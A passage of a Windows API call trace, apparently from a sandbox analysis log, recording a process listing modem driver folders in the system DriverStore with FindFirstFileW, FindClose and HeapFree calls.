lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmarch.inf_amd64_neutral_4261401e3170ebfb\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4995b60d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67274df4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67274df4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.506] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.506] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmarn.inf_amd64_neutral_fa693d8797766f49\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49a19cee, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6729af54, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6729af54, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.507] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.507] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmati.inf_amd64_neutral_ded8f26cdee953c3\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad83cf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x672e7215, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x672e7215, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.507] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.507] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmatm2k.inf_amd64_neutral_64a8fb018ead55a7\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49bbcc11, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x675226b9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x675226b9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.508] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.508] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaus.inf_amd64_neutral_5fa4270b9924b918\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49c55192, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6756e979, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6756e979, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.508] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.509] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmboca.inf_amd64_neutral_cc532ed7b3b5b5a9\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49d399d4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x677a9e1e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x677a9e1e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.509] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.509] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr002.inf_amd64_neutral_ce2134188ab21f59\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48c1db94, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66db21eb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66db21eb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.510] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.510] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.510] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr004.inf_amd64_neutral_ccf1bc353e588fe1\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48cdc276, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66dd834b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66dd834b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.510] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.510] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.510] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr005.inf_amd64_neutral_d140721f97061bba\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48d9a957, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66dfe4ac, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66dfe4ac, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.511] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.511] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.511] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr006.inf_amd64_neutral_40c76453575b1208\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48e59038, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66dfe4ac, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66dfe4ac, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.511] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.511] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.511] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr007.inf_amd64_neutral_91d259640bad7d26\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48f3d87a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e2460c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e2460c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.512] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.512] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr008.inf_amd64_neutral_2cedaac353c381da\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48ffbf5b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e4a76c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e4a76c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.512] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.512] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr00a.inf_amd64_neutral_aa4f0850ff03674e\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x490ba63d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e708cd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e708cd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.513] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.513] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.513] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbsb.inf_amd64_neutral_56a9f6bceeec7f72\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49e1e215, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x679e52c2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x679e52c2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.513] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.515] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbtmdm.inf_amd64_neutral_2e4da8629fc5904e\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39c712bb, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f6f97d0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f6f97d0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.515] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.515] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbug3.inf_amd64_neutral_7617862a9cc286da\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49eb6796, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a0b422, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a0b422, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.516] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.517] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbw561.inf_amd64_neutral_fe42c0ff14d5562b\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49f74e78, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a0b422, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a0b422, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.520] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.520] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmc26a.inf_amd64_neutral_547edd894d7c19d9\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a00d3f9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a31582, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a31582, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.520] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.520] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcdp.inf_amd64_neutral_170c11f3a6d3f0a8\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a0cbada, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a31582, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a31582, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.521] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.521] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcm28.inf_amd64_neutral_d3fa0f62d3d7cea1\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a1d647c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a7d843, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a7d843, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.521] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.521] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcodex.inf_amd64_neutral_9bb71004e7b8f7ae\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a2bacbe, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67ac9b03, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67ac9b03, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.522] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.522] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcom1.inf_amd64_neutral_96c22c683482d8bd\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a39f500, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67aefc64, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67aefc64, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.522] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.522] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcommu.inf_amd64_neutral_83cc415156be45c8\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a45dbe1, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67b3bf24, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67b3bf24, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.523] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.523] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcomp.inf_amd64_neutral_e5ca2f01ca47bddb\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a4f6162, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67b62084, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67b62084, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.524] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.524] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcpq.inf_amd64_neutral_fbc4a14a6a13d0c8\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3aa06f9e, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c3e9f0e, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c3e9f0e, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.524] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.524] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcpq2.inf_amd64_neutral_e9784021af1f5e24\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a5b4843, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67b881e5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67b881e5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.525] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.525] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcpv.inf_amd64_neutral_5667cca434e3a6b7\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a64cdc4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67bae345, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67bae345, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.525] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.525] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcrtix.inf_amd64_neutral_e91a5dc0655e200a\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6e5346, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67bd44a5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67bd44a5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.526] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.526] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.526] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcxhv6.inf_amd64_neutral_81ba64c5b6150dd3\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b0515e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c363a89, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c363a89, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.528] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.529] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcxpv6.inf_amd64_neutral_f62ac4bd04e653d0\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50c81f21, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c3d5eaa, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c3d5eaa, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.545] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.546] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.546] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdcm5.inf_amd64_neutral_0bb09f3e5a59f3a8\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a7c9b87, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67c20766, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67c20766, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.547] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.547] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 